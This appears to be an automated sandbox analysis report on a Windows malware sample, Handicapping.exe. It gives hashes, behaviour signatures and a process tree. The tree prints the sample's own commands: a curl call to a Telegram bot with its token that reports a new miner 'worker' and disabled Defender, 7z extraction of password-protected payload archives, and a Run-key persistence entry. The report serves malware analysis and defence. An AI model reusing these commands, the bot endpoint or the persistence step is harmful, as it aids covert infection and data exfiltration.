Analysis
-
max time kernel
34s -
max time network
23s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
05-12-2021 20:42
Static task
static1
Behavioral task
behavioral1
Sample
Handicapping.exe
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
Handicapping.exe
-
Size
120KB
-
MD5
60d5e78626f9961a87998315f18fc686
-
SHA1
2bdfc1f3a83bf15de8439b5846079ef0f560f30f
-
SHA256
332e105954e8c17225ff83ed61414ab849f3157d6524fb59d431d0e7be4ef941
-
SHA512
382a1e24421f1434fc4d8162ecbd3f0cbf7a888b5fb86a96cdf732d2a670c70e7e0b4e0ced7f4db321efdcf2959bc4d7da05c78cfea8f091f25e002bda583877
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3500 created 3300 3500 WerFault.exe Handicapping.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Handicapping.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun" Handicapping.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3500 3300 WerFault.exe Handicapping.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
WerFault.exepid process 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
WerFault.exedescription pid process Token: SeDebugPrivilege 3500 WerFault.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
Handicapping.exedescription pid process target process PID 3300 wrote to memory of 3612 3300 Handicapping.exe cmd.exe PID 3300 wrote to memory of 3612 3300 Handicapping.exe cmd.exe PID 3300 wrote to memory of 1948 3300 Handicapping.exe cmd.exe PID 3300 wrote to memory of 1948 3300 Handicapping.exe cmd.exe PID 3300 wrote to memory of 3960 3300 Handicapping.exe cmd.exe PID 3300 wrote to memory of 3960 3300 Handicapping.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Handicapping.exe"C:\Users\Admin\AppData\Local\Temp\Handicapping.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5054999145:AAFdU1qLbwj0w1g6jHdF6-sMbR_aB06M0ME/sendMessage?chat_id=-773528453&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3300 -s 16882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken